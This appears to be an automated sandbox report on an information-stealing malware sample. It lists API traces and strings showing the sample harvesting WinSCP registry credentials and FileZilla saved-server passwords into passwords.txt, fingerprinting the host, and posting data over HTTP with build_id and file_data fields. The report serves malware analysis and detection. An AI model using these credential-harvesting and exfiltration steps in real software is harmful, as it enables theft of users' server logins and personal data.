stringregistrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 0040B2FB
memset.MSVCRT ref: 0040B324
memset.MSVCRT ref: 0040B344
memset.MSVCRT ref: 0040B358
memset.MSVCRT ref: 0040B36C
memset.MSVCRT ref: 0040B37B
memset.MSVCRT ref: 0040B389
memset.MSVCRT ref: 0040B39A
RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040B3C2
RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040B3EA
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040B439
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040B456
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040B46A
HeapAlloc.KERNEL32(00000000), ref: 0040B471
lstrcat.KERNEL32(?,Soft: WinSCP), ref: 0040B482
lstrcat.KERNEL32(?,Host: ), ref: 0040B490
RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?), ref: 0040B4B3
lstrcat.KERNEL32(?,?), ref: 0040B4BF
RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?), ref: 0040B4E9
lstrcat.KERNEL32(?,00000000), ref: 0040B50C
lstrcat.KERNEL32(?,:22), ref: 0040B527
lstrcat.KERNEL32(?,00423E70), ref: 0040B535
lstrcat.KERNEL32(?,Login: ), ref: 0040B543
RegGetValueA.ADVAPI32(?,?,UserName,00000002,00000000,?,?), ref: 0040B566
lstrcat.KERNEL32(?,?), ref: 0040B572
lstrcat.KERNEL32(?,00423E88), ref: 0040B580
RegGetValueA.ADVAPI32(?,?,Password,00000002,00000000,?,?), ref: 0040B5A3
lstrcat.KERNEL32(?,Password: ), ref: 0040B5AD
StrCmpCA.SHLWAPI(?,00423B63), ref: 0040B5BF
lstrcat.KERNEL32(?,00000000), ref: 0040B5F9
lstrcat.KERNEL32(?,00423EA4), ref: 0040B612
lstrcat.KERNEL32(?,00423EA8), ref: 0040B620
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040B645
memset.MSVCRT ref: 0040B656
memset.MSVCRT ref: 0040B664
lstrlen.KERNEL32(?), ref: 0040B67B

Part of subcall function 004010A5: _EH_prolog.MSVCRT ref: 004010AA

Part of subcall function 00412DF0: _EH_prolog.MSVCRT ref: 00412DF5
Part of subcall function 00412DF0: CreateThread.KERNEL32(00000000,00000000,00411D06,?,00000000,00000000), ref: 00412E95
Part of subcall function 00412DF0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00412E9D

memset.MSVCRT ref: 0040B6CA

Strings

Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040B3AF
UseMasterPassword, xrefs: 0040B3DD
Security, xrefs: 0040B3E2
Password: , xrefs: 0040B5A5
PortNumber, xrefs: 0040B4D3
Host: , xrefs: 0040B488
passwords.txt, xrefs: 0040B68D
Login: , xrefs: 0040B53B
HostName, xrefs: 0040B4A4
Password, xrefs: 0040B594
:22, xrefs: 0040B51F
Soft: WinSCP, xrefs: 0040B47A
UserName, xrefs: 0040B557
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0040B42F

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$memset$Value$H_prolog$EnumHeapOpen$AllocCreateObjectProcessSingleThreadWaitlstrlen
String ID: :22$Host: $HostName$Login: $Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 4023705341-1250616252
Opcode ID: 0ae2b1ab71da14bfedc18c90a8699ceb4b08373d83c707b2c4e8e0978bf3169d
Instruction ID: dafb6aed670c4b7603237ff4a291613748089690d59408b5a89c45ceb1129978
Opcode Fuzzy Hash: 0ae2b1ab71da14bfedc18c90a8699ceb4b08373d83c707b2c4e8e0978bf3169d
Instruction Fuzzy Hash: A2C146B190012DAFDF019BE0DD86EFFBB7DEB0430AF000466B515B2191D7385E488BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040B6FE Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 370
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 0040B703

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

Part of subcall function 0040FA35: SHGetFolderPathA.SHELL32(00000000,f;B,00000000,00000000,?), ref: 0040FA66

Part of subcall function 0040E685: _EH_prolog.MSVCRT ref: 0040E68A
Part of subcall function 0040E685: lstrcpy.KERNEL32(00000000), ref: 0040E6D6
Part of subcall function 0040E685: lstrcat.KERNEL32(?,?), ref: 0040E6E0

Part of subcall function 0040E63E: lstrcpy.KERNEL32(00000000,?), ref: 0040E677

Part of subcall function 0040E6F9: _EH_prolog.MSVCRT ref: 0040E6FE
Part of subcall function 0040E6F9: lstrlen.KERNEL32(?,?,?,?,?,004156A9,?,?,00424818,?,00000000,004243BE), ref: 0040E726
Part of subcall function 0040E6F9: lstrcpy.KERNEL32(00000000), ref: 0040E74D
Part of subcall function 0040E6F9: lstrcat.KERNEL32(?,?), ref: 0040E758

Part of subcall function 0040E5B7: lstrcpy.KERNEL32(00000000,GPA), ref: 0040E5DD

Part of subcall function 00406572: _EH_prolog.MSVCRT ref: 00406577
Part of subcall function 00406572: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0040659A
Part of subcall function 00406572: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004065B1
Part of subcall function 00406572: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004065CD
Part of subcall function 00406572: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 004065E7
Part of subcall function 00406572: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406608

Part of subcall function 0040FA81: LocalAlloc.KERNEL32(00000040,00411BB2,00000001,00000000,?,00411BB1,00000000,00000000), ref: 0040FA9A

strtok_s.MSVCRT ref: 0040B7E1
GetProcessHeap.KERNEL32(00000000,000F423F,00423B6E,00423B6B,00423B6A,00423B67), ref: 0040B835
HeapAlloc.KERNEL32(00000000), ref: 0040B83C
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040B850
lstrlen.KERNEL32(00000000), ref: 0040B85B
StrStrA.SHLWAPI(00000000,<Port>), ref: 0040B893
lstrlen.KERNEL32(00000000), ref: 0040B89E
StrStrA.SHLWAPI(00000000,<User>), ref: 0040B8DC
lstrlen.KERNEL32(00000000), ref: 0040B8E7
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040B925
lstrlen.KERNEL32(00000000), ref: 0040B934
lstrlen.KERNEL32(?), ref: 0040BB2F

Part of subcall function 004010A5: _EH_prolog.MSVCRT ref: 004010AA

Part of subcall function 00412DF0: _EH_prolog.MSVCRT ref: 00412DF5
Part of subcall function 00412DF0: CreateThread.KERNEL32(00000000,00000000,00411D06,?,00000000,00000000), ref: 00412E95
Part of subcall function 00412DF0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00412E9D

memset.MSVCRT ref: 0040BB7F

Strings

<User>, xrefs: 0040B8D6
Host: , xrefs: 0040BA25
<Pass encoding="base64">, xrefs: 0040B91F
<Host>, xrefs: 0040B84A
Login: , xrefs: 0040BA73
Soft: FileZilla, xrefs: 0040BA17
passwords.txt, xrefs: 0040BB41
<Port>, xrefs: 0040B88D
Password: , xrefs: 0040BAA1
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040B770

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitmemsetstrtok_s
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 486015307-935134978
Opcode ID: 2279815c5af11932ae22f43602dd399c164451bf8a6e33b3e2f634c84b572a83
Instruction ID: 3abb7f64373fa4bba0ef9717ba665e89885f2cddbb36de3fbc11113f1a1a97bf
Opcode Fuzzy Hash: 2279815c5af11932ae22f43602dd399c164451bf8a6e33b3e2f634c84b572a83
Instruction Fuzzy Hash: 2DE16531D00158EACB05EBE6DD46EEEBB78AF14309F50086AF411721D2EF795B18CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004047D3 Relevance: 67.2, APIs: 23, Strings: 15, Instructions: 750
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 004047D8

Part of subcall function 0040E5B7: lstrcpy.KERNEL32(00000000,GPA), ref: 0040E5DD

Part of subcall function 00403E7A: _EH_prolog.MSVCRT ref: 00403E7F
Part of subcall function 00403E7A: ??_U@YAPAXI@Z.MSVCRT ref: 00403EB1
Part of subcall function 00403E7A: ??_U@YAPAXI@Z.MSVCRT ref: 00403EBA
Part of subcall function 00403E7A: ??_U@YAPAXI@Z.MSVCRT ref: 00403EC3
Part of subcall function 00403E7A: lstrlen.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403EDD
Part of subcall function 00403E7A: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403EED

lstrlen.KERNEL32(00000000), ref: 00404847

Part of subcall function 0040FAC0: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0040FAE4
Part of subcall function 0040FAC0: GetProcessHeap.KERNEL32(00000000,?,?,0040483B,?,?,?,?,?,?), ref: 0040FAF1
Part of subcall function 0040FAC0: HeapAlloc.KERNEL32(00000000,?,0040483B,?,?,?,?,?,?), ref: 0040FAF8

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

StrCmpCA.SHLWAPI(?,004238D7,004238D3,004238CB,004238C7,004238C6), ref: 004048CA
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004049F5
HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00404A2F
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404A53

Part of subcall function 0040E6F9: _EH_prolog.MSVCRT ref: 0040E6FE
Part of subcall function 0040E6F9: lstrlen.KERNEL32(?,?,?,?,?,004156A9,?,?,00424818,?,00000000,004243BE), ref: 0040E726
Part of subcall function 0040E6F9: lstrcpy.KERNEL32(00000000), ref: 0040E74D
Part of subcall function 0040E6F9: lstrcat.KERNEL32(?,?), ref: 0040E758

Part of subcall function 0040E63E: lstrcpy.KERNEL32(00000000,?), ref: 0040E677

Part of subcall function 0040E685: _EH_prolog.MSVCRT ref: 0040E68A
Part of subcall function 0040E685: lstrcpy.KERNEL32(00000000), ref: 0040E6D6
Part of subcall function 0040E685: lstrcat.KERNEL32(?,?), ref: 0040E6E0

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00000000,?,00423990,00000000,?,?,00000000), ref: 00404F63
lstrlen.KERNEL32(00000000), ref: 00404F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404F87
HeapAlloc.KERNEL32(00000000), ref: 00404F8E
lstrlen.KERNEL32(00000000), ref: 00404FA0
memcpy.MSVCRT ref: 00404FB3
lstrlen.KERNEL32(00000000,?,?), ref: 00404FCA
memcpy.MSVCRT ref: 00404FD4
lstrlen.KERNEL32(00000000), ref: 00404FE5
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404FFE
memcpy.MSVCRT ref: 0040500B
lstrlen.KERNEL32(00000000,?,00000000), ref: 00405020
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405031
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405058
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004050DA
InternetCloseHandle.WININET(00000000), ref: 004050E5
InternetCloseHandle.WININET(?), ref: 004050EE

Strings

------, xrefs: 00404D0F
------, xrefs: 00404927
ERROR, xrefs: 004051BD
build_id, xrefs: 00404C51
------, xrefs: 00404A59
ERROR, xrefs: 00405065
", xrefs: 00404B2C
------, xrefs: 00404E5E
------, xrefs: 00404BA9
0, xrefs: 004050B8
", xrefs: 00404DE2
", xrefs: 00404F30
--, xrefs: 0040494E
", xrefs: 00404C7B
file_data, xrefs: 00404F06

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$H_prologHeap$Httpmemcpy$AllocCloseHandleProcessRequestlstrcat$BinaryConnectCrackCryptFileInfoOpenOptionQueryReadSendString
String ID: ------$"$"$"$"$--$------$------$------$------$0$ERROR$ERROR$build_id$file_data
API String ID: 1668742255-1805485788
Opcode ID: 1982c3b644e91933072f4f5f3f92312b8c1abb531cdc7b898659ab580ed6eb8e
Instruction ID: e4656bce2390a430ae880b6d9b5c77baf21896f09229944d3e04ae0c67427a74
Opcode Fuzzy Hash: 1982c3b644e91933072f4f5f3f92312b8c1abb531cdc7b898659ab580ed6eb8e
Instruction Fuzzy Hash: 1F627771800148EACB05EBE1D955AEEBBB8AF24308F50486EF501731C2EF795B19DB75

Uniqueness

Uniqueness Score: -1.00%

Function 0040554E Relevance: 54.9, APIs: 21, Strings: 10, Instructions: 647
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00405553

Part of subcall function 0040E5B7: lstrcpy.KERNEL32(00000000,GPA), ref: 0040E5DD

Part of subcall function 00403E7A: _EH_prolog.MSVCRT ref: 00403E7F
Part of subcall function 00403E7A: ??_U@YAPAXI@Z.MSVCRT ref: 00403EB1
Part of subcall function 00403E7A: ??_U@YAPAXI@Z.MSVCRT ref: 00403EBA
Part of subcall function 00403E7A: ??_U@YAPAXI@Z.MSVCRT ref: 00403EC3
Part of subcall function 00403E7A: lstrlen.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403EDD
Part of subcall function 00403E7A: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403EED

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004055FE
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040579D
HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 004057D4
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,mode,00000000,?,00000000,?,00423A10,00000000), ref: 00405BE3
lstrlen.KERNEL32(00000000), ref: 00405BF4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405BFE
HeapAlloc.KERNEL32(00000000), ref: 00405C05
lstrlen.KERNEL32(00000000), ref: 00405C16
memcpy.MSVCRT ref: 00405C27
lstrlen.KERNEL32(00000000), ref: 00405C38
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405C51
memcpy.MSVCRT ref: 00405C5A
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405C6D
HttpSendRequestA.WININET(?,00000000,00000000), ref: 00405C81
InternetReadFile.WININET(?,?,000000C7,?), ref: 00405CD5
InternetCloseHandle.WININET(?), ref: 00405CE0
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004057F9

Part of subcall function 0040E6F9: _EH_prolog.MSVCRT ref: 0040E6FE
Part of subcall function 0040E6F9: lstrlen.KERNEL32(?,?,?,?,?,004156A9,?,?,00424818,?,00000000,004243BE), ref: 0040E726
Part of subcall function 0040E6F9: lstrcpy.KERNEL32(00000000), ref: 0040E74D
Part of subcall function 0040E6F9: lstrcat.KERNEL32(?,?), ref: 0040E758

Part of subcall function 0040E685: _EH_prolog.MSVCRT ref: 0040E68A
Part of subcall function 0040E685: lstrcpy.KERNEL32(00000000), ref: 0040E6D6
Part of subcall function 0040E685: lstrcat.KERNEL32(?,?), ref: 0040E6E0

InternetCloseHandle.WININET(?), ref: 00405CE9
InternetCloseHandle.WININET(?), ref: 00405CF2
StrCmpCA.SHLWAPI(?), ref: 00405615

Part of subcall function 0040E63E: lstrcpy.KERNEL32(00000000,?), ref: 0040E677

Strings

------, xrefs: 0040594F
------, xrefs: 00405697
", xrefs: 004058D2
", xrefs: 00405B87
", xrefs: 00405A21
------, xrefs: 00405AB5
), xrefs: 00405D34
------, xrefs: 004057FF
mode, xrefs: 00405B5D
build_id, xrefs: 004059F7

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$H_prolog$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$)$------$------$------$------$build_id$mode
API String ID: 2237346945-290892794
Opcode ID: 9ff6a15c5c7019457d2c3c832dace0c2a20d5876813e0eac17f59894b2582284
Instruction ID: 6d38a9fc3694a3e8b94bd91dac81915679d7add13e6d72e620f29f3178a6d092
Opcode Fuzzy Hash: 9ff6a15c5c7019457d2c3c832dace0c2a20d5876813e0eac17f59894b2582284
Instruction Fuzzy Hash: 9A424771800248EADB05EBE2D956AEEBBB89F24308F50086EF501731C2DF795B19DB75

Uniqueness

Uniqueness Score: -1.00%

Function 00412FB4 Relevance: 51.8, APIs: 3, Strings: 26, Instructions: 1023
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00412FB9

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

Part of subcall function 0040E6F9: _EH_prolog.MSVCRT ref: 0040E6FE
Part of subcall function 0040E6F9: lstrlen.KERNEL32(?,?,?,?,?,004156A9,?,?,00424818,?,00000000,004243BE), ref: 0040E726
Part of subcall function 0040E6F9: lstrcpy.KERNEL32(00000000), ref: 0040E74D
Part of subcall function 0040E6F9: lstrcat.KERNEL32(?,?), ref: 0040E758

Part of subcall function 0040E63E: lstrcpy.KERNEL32(00000000,?), ref: 0040E677

Part of subcall function 0040E685: _EH_prolog.MSVCRT ref: 0040E68A
Part of subcall function 0040E685: lstrcpy.KERNEL32(00000000), ref: 0040E6D6
Part of subcall function 0040E685: lstrcat.KERNEL32(?,?), ref: 0040E6E0

Part of subcall function 0040E954: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,0042435E), ref: 0040E962
Part of subcall function 0040E954: HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,0042435E), ref: 0040E969
Part of subcall function 0040E954: GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,0042435E), ref: 0040E975
Part of subcall function 0040E954: wsprintfA.USER32 ref: 0040E9A0

Part of subcall function 0040F18B: memset.MSVCRT ref: 0040F1B1
Part of subcall function 0040F18B: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,^CB,?,?,00000000), ref: 0040F1CD
Part of subcall function 0040F18B: RegQueryValueExA.KERNEL32(^CB,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 0040F1EC
Part of subcall function 0040F18B: CharToOemA.USER32(?,?), ref: 0040F209

Part of subcall function 0040F218: GetCurrentHwProfileA.ADVAPI32(?), ref: 0040F229

Part of subcall function 0040F253: _EH_prolog.MSVCRT ref: 0040F258
Part of subcall function 0040F253: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,?,00000000), ref: 0040F27B
Part of subcall function 0040F253: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0040F2AD
Part of subcall function 0040F253: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0040F2F0
Part of subcall function 0040F253: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 0040F2F7

GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,00424404,00000000,?,00000000,00000000,?,HWID: ,00000000,?,004243F8,00000000), ref: 004132E7

Part of subcall function 0040FD15: OpenProcess.KERNEL32(00000410,00000000,004132F7), ref: 0040FD2D
Part of subcall function 0040FD15: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0040FD48
Part of subcall function 0040FD15: CloseHandle.KERNEL32(00000000), ref: 0040FD4F

Part of subcall function 0040F3C1: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,004133DC,00000000,?,Windows: ,00000000,?,00424428,00000000,?,Work Dir: In memory), ref: 0040F3D5
Part of subcall function 0040F3C1: HeapAlloc.KERNEL32(00000000,?,?,?,004133DC,00000000,?,Windows: ,00000000,?,00424428,00000000,?,Work Dir: In memory,00000000,?), ref: 0040F3DC

Part of subcall function 0040F4D4: _EH_prolog.MSVCRT ref: 0040F4D9
Part of subcall function 0040F4D4: CoInitializeEx.OLE32(00000000,00000000,?,?,?,?,?,?,00424428,00000000,?,Work Dir: In memory,00000000,?,00424410,00000000), ref: 0040F4E9
Part of subcall function 0040F4D4: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,?,00424428), ref: 0040F4FA
Part of subcall function 0040F4D4: CoCreateInstance.OLE32(00424CC8,00000000,00000001,00424BF8,?,?,?,?,?,?,?,00424428,00000000,?,Work Dir: In memory,00000000), ref: 0040F514
Part of subcall function 0040F4D4: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,?,?,?,?,00424428,00000000), ref: 0040F54A
Part of subcall function 0040F4D4: VariantInit.OLEAUT32(?), ref: 0040F5A5

Part of subcall function 0040F65D: _EH_prolog.MSVCRT ref: 0040F662
Part of subcall function 0040F65D: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00424410,00000000,?,00000000), ref: 0040F672
Part of subcall function 0040F65D: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00424410), ref: 0040F683
Part of subcall function 0040F65D: CoCreateInstance.OLE32(00424CC8,00000000,00000001,00424BF8,?,?,00000000,?,Work Dir: In memory,00000000,?,00424410,00000000,?,00000000), ref: 0040F69D
Part of subcall function 0040F65D: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00424410,00000000), ref: 0040F6D3
Part of subcall function 0040F65D: VariantInit.OLEAUT32(?), ref: 0040F722

Part of subcall function 0040E919: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,00413583,00000000,?,Computer Name: ,00000000,?,00424458,00000000,?,00000000,00000000), ref: 0040E925
Part of subcall function 0040E919: HeapAlloc.KERNEL32(00000000,?,?,00413583,00000000,?,Computer Name: ,00000000,?,00424458,00000000,?,00000000,00000000,?,AV: ), ref: 0040E92C
Part of subcall function 0040E919: GetComputerNameA.KERNEL32(00000000,00000000), ref: 0040E940

Part of subcall function 0040E8E7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00415689,004243BE), ref: 0040E8F3
Part of subcall function 0040E8E7: HeapAlloc.KERNEL32(00000000,?,?,?,00415689,004243BE), ref: 0040E8FA
Part of subcall function 0040E8E7: GetUserNameA.ADVAPI32(00000000,?), ref: 0040E90E

Part of subcall function 0040F116: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 0040F12B
Part of subcall function 0040F116: GetDeviceCaps.GDI32(00000000,00000008), ref: 0040F136
Part of subcall function 0040F116: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040F141
Part of subcall function 0040F116: ReleaseDC.USER32(00000000,00000000), ref: 0040F14C
Part of subcall function 0040F116: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,00413685,?,00000000,?,Display Resolution: ,00000000,?,0042447C,00000000,?), ref: 0040F158
Part of subcall function 0040F116: HeapAlloc.KERNEL32(00000000,?,00000000,?,?,00413685,?,00000000,?,Display Resolution: ,00000000,?,0042447C,00000000,?,00000000), ref: 0040F15F
Part of subcall function 0040F116: wsprintfA.USER32 ref: 0040F171

Part of subcall function 0040EA01: _EH_prolog.MSVCRT ref: 0040EA06
Part of subcall function 0040EA01: GetKeyboardLayoutList.USER32(00000000,00000000,004240C7,00000000,?,00000000), ref: 0040EA38
Part of subcall function 0040EA01: LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040EA46
Part of subcall function 0040EA01: GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040EA51
Part of subcall function 0040EA01: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040EA7B
Part of subcall function 0040EA01: LocalFree.KERNEL32(?), ref: 0040EB1F

Part of subcall function 0040E9AE: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,00424458,00000000,?,00000000,00000000,?,AV: ), ref: 0040E9BF
Part of subcall function 0040E9AE: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00424458,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040E9C6
Part of subcall function 0040E9AE: GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00424458,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040E9D5
Part of subcall function 0040E9AE: wsprintfA.USER32 ref: 0040E9F3

Part of subcall function 0040EB34: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413901,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004244D8), ref: 0040EB48
